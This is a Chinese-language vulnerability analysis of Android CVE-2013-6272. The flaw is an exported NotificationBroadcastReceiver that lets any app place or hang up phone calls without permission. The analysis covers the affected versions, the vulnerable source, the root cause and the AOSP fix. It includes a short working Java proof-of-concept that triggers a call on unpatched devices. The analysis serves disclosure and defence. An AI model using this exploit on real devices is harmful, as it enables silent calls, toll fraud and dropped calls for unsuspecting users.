Android电话拨打权限绕过漏洞(CVE-2013-6272)分析
原文:http://blogs.360.cn/360mobile/2014/07/08/cve-2013-6272/
1. CVE-2013-6272漏洞背景
CVE-2013-6272是一个安卓平台电话拨打权限绕过漏洞。该漏洞实际上是柏林的安全研究机构curesec在2013年底发现并秘密报告给google的,而并不是是某国内团队发现的。
Curesec同一时候也是安卓锁屏绕过漏洞(CVE-2013-6271)的发现者。Curesec于2014年7月4日公开了一个拨打电话相关的漏洞[1],我们对这个漏洞进行了分析。
这个漏洞在android 4.1.1版本号中被引入。在4.4.3版本号中被修复,手机系统版本号仍停留在4.1.1~4.4.2的机型都收到了影响。
2. Android受影响版本号
依据已经公开的信息和我们对于AOSP changelog的分析,该漏洞影响分布情况例如以下:
Android版本号 |
SDK 版本号 |
是否受影响 |
4.1.1 |
16 |
是 |
4.1.2 |
16 |
是 |
4.2.2 |
17 |
是 |
4.4.2 |
19 |
是 |
4.4.3或更高 |
19 |
否 |
3. 漏洞的危害
没有申明call_phone权限的应用无需交互能够拨打随意电话。随意应用能够挂断当前正在进行的通话。
而用户对此毫不知情。
4.漏洞原理
此漏洞主要是由于一个误导出的BroadCastReceiver:com.android.phone.PhoneGlobals$NotificationBroadcastReceiver
让我们看下NotificationBroadcastReceiver的源代码[3]
public static class NotificationBroadcastReceiver extends BroadcastReceiver { |
@Override |
public void onReceive(Context context, Intent intent) { |
String action = intent.getAction(); |
// TODO: use "if (VDBG)" here. |
Log.d(LOG_TAG, "Broadcast from Notification: " + action); |
if (action.equals(ACTION_HANG_UP_ONGOING_CALL)) { |
PhoneUtils.hangup(PhoneGlobals.getInstance().mCM); |
} else if (action.equals(ACTION_CALL_BACK_FROM_NOTIFICATION)) { |
// Collapse the expanded notification and the notification item itself. |
closeSystemDialogs(context); |
clearMissedCallNotification(context); |
Intent callIntent = new Intent(Intent.ACTION_CALL_PRIVILEGED, intent.getData()); |
callIntent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK |
| Intent.FLAG_ACTIVITY_EXCLUDE_FROM_RECENTS); |
context.startActivity(callIntent); |
} else if (action.equals(ACTION_SEND_SMS_FROM_NOTIFICATION)) { |
// Collapse the expanded notification and the notification item itself. |
closeSystemDialogs(context); |
clearMissedCallNotification(context); |
Intent smsIntent = new Intent(Intent.ACTION_SENDTO, intent.getData()); |
smsIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK); |
context.startActivity(smsIntent); |
这个reveiver处理3种类型的intent,由于NotificationBroadcastReceiver是导出的而且没有做不论什么的权限限制,随意应用都能够发intent来调用这个BroadcastReceiver.
这3类intent的危害
Intent | 危害 |
ACTION_HANG_UP_ONGOING_CALL | 挂断当前的通话 |
ACTION_CALL_BACK_FROM_NOTIFICATION | 拨打随意电话 |
ACTION_SEND_SMS_FROM_NOTIFICATION | 发送短信,但须要用户交互。没太大危害 |
利用此漏洞拨打电话的代码
public void onClick(View view) { |
Toast t = Toast.makeText(getBaseContext(), |
"Testing call without permissions now!" , |
Toast.LENGTH_LONG); |
t.show(); |
Intent intent = new Intent(); |
intent.setComponent( new ComponentName( |
"com.android.phone" , |
"com.android.phone.PhoneGlobals$NotificationBroadcastReceiver" )); |
intent.setAction( "com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION" ); |
intent.setData(Uri.parse( "tel:31337" )); |
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); |
getBaseContext().sendBroadcast(intent); |
} |
5. 产生漏洞的主要原因
产生此漏洞的原因非常有趣,由于android开发者的疏忽,本来限制
BroadcastReceiver导出应该在其标签中加上属性android:exported=”false”,但开发者漏掉了”android:”。写成了exported=”false”,这种属性是不起作用的,而包括有intent filters的BroadcastReceiver默认是导出的,从而导致这个BroadcastReceiver被误导出。
6.漏洞修复
此漏洞的修复非常easy,其diff[3]例如以下:
<!-- BroadcastReceiver for receiving Intents from Notification mechanism. --> |
- < receiver android:name = "PhoneGlobals$NotificationBroadcastReceiver" exported = "false" > |
+ < receiver android:name = "PhoneGlobals$NotificationBroadcastReceiver" android:exported = "false" > |
< intent-filter > |
< action android:name = "com.android.phone.ACTION_HANG_UP_ONGOING_CALL" /> |
<action android:name="com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION" / |
眼下我们尚未捕获到利用此漏洞拨打电话的恶意样本。可是该漏洞的原理及利用代码已经开源。所以有可能在未来被恶意利用。我们将会持续关注此漏洞并提供可能的解决方式。
參考:
[1]https://android.googlesource.com/platform/packages/services/Telephony/+/79fc3b3%5E%21/
[2]http://blog.curesec.com/article/blog/35.html
[3]http://androidxref.com/4.4_r1/xref/packages/services/Telephony/src/com/android/phone/PhoneGlobals.java#1128
Android电话拨打权限绕过漏洞(CVE-2013-6272)分析的更多相关文章
- Python 实现 Discuz论坛附件下载权限绕过漏洞
背景:最近压力有些大,想玩点游戏放松下,去Mac论坛下载,发现需要各种权限,于是蛋疼了. 所以,上网查了discuz! x3.1破解,手动替换,发现出现“链接已过期”.所以写了下面程序. 0.将下列代 ...
- linux sudo root 权限绕过漏洞(CVE-2019-14287)
0x01 逛圈子社区论坛 看到了 linux sudo root 权限绕过漏洞(CVE-2019-14287) 跟着复现下 综合来说 这个漏洞作用不大 需要以下几个前提条件 1.知道当前普通用户的密 ...
- Couchdb 垂直权限绕过漏洞(CVE-2017-12635)漏洞复现
couchdb简介: Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”.它是一个使用JSON作为数据存储格式,javascript作为查询语言,M ...
- CVE-2017-12635(Couchdb垂直权限绕过漏洞)
简介 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapRedu ...
- broadAnywhere:Broadcast组件权限绕过漏洞(Bug: 17356824)
原创内容,转载请注明出处 http://retme.net/index.php/2014/11/14/broadAnywhere-bug-17356824.html Lolipop源代码已经放出有些日 ...
- PJzhang:CVE-2019-14287 sudo权限绕过漏洞复现
猫宁!!! 参考链接:Ms08067实验室公众号 sudo 1.8.28版本之前有漏洞. 更新完kali linux,deepin截图工具失效,只能用自带的,不能划重点. 看一下sudo版本,1.8. ...
- SaltStack 水平权限绕过漏洞(CVE-2020-11651)
影响版本 SaltStack < 2019.2.4 SaltStack < 3000.2 poc git clone https://github.com/jasperla/CVE-202 ...
- Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
影响版本:小于 1.7.0 以及 小于 2.1.1 首先,发送如下数据包: 修改数据包 { "type": "user", "name": ...
- Linux sudo权限绕过(CVE-2019-14287)
2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复. 此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运 ...
随机推荐
- 百度乐播音乐真实地址查找api接口
1.百度乐播官网:http://lebo.baidu.com: 随便点击进去一个音乐界面,如:http://lebo.baidu.com/album/9036366 2.chrome浏览器右击'检查' ...
- [BZOJ 4870] 组合数问题
Link: 传送门 Solution: 组合数的式子都可以先想想能不能递推,写出来就是: $\sum C_{n*k}^{i*k+r}=\sum C_{n*k-1}^{i*k+r}+\sum C_{n* ...
- Spring AOP笔记
AOP的核心概念 AOP(Aspect-Oriented Programming)面向切面编程可以实现横切点与他们所影响的对象之间的解耦.如将公共的日志.权限.事务等业务隔离出来,但不影响原来程序的逻 ...
- 【洛谷】2474:[SCOI2008]天平【差分约束系统】
P2474 [SCOI2008]天平 题目背景 2008四川NOI省选 题目描述 你有n个砝码,均为1克,2克或者3克.你并不清楚每个砝码的重量,但你知道其中一些砝码重量的大小关系.你把其中两个砝码A ...
- Express中间件
一.编写中间件 中间件函数能够访问请求对象(req),响应对象(res),应用程序的请求/响应循环中的下一个中间件函数.下一个中间件函数通常由名为next的变量来表示. 中间件函数可以执行以下任务: ...
- HTML5 UI 控件Mobiscroll的使用(年月日三级联动)
概述: 遇到制作一个html5界面,需要选择年月日,其实这个功能很常用.一般我们都是网上找,之前也没有收藏一个自己常用的,今天发现一个不错的库.特此记录一下使用过程,以便以后遇到了方面查阅. 1.官方 ...
- Java中日期类型和mysql中日期类型进行整合
1. java与mysql中日期.时间类型总结: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 mysql(版本:5.1.50)的时间日期类型如下: da ...
- ASP.NET 构建高性能网站 第2篇
前言:在对ASP.NET网站进行优化的时候,往往不是只是懂得ASP.NET就足够了的. 在优化的过程中,一般先是找出问题可能存在的地方,然后证明找出的问题就是要解决的问题,确认之后,在进行一些措施.系 ...
- mysql反向解析导致连接缓慢
Content 0.序 1.问题 2.原因 3.解决办法 0.序 本文主要是记录Mysql安装在 VMWARE下,本地连接Mysql速度很慢的原因及解决办法. 1.问题 本地的一个网站使用mysql数 ...
- webpack入门(1)
webpack入门(1) 源码戳这里 ps:每个案例对应相应的demo,例如"案例1"对应"demo1" 一.webpack基本功能及简单案例 安装webpac ...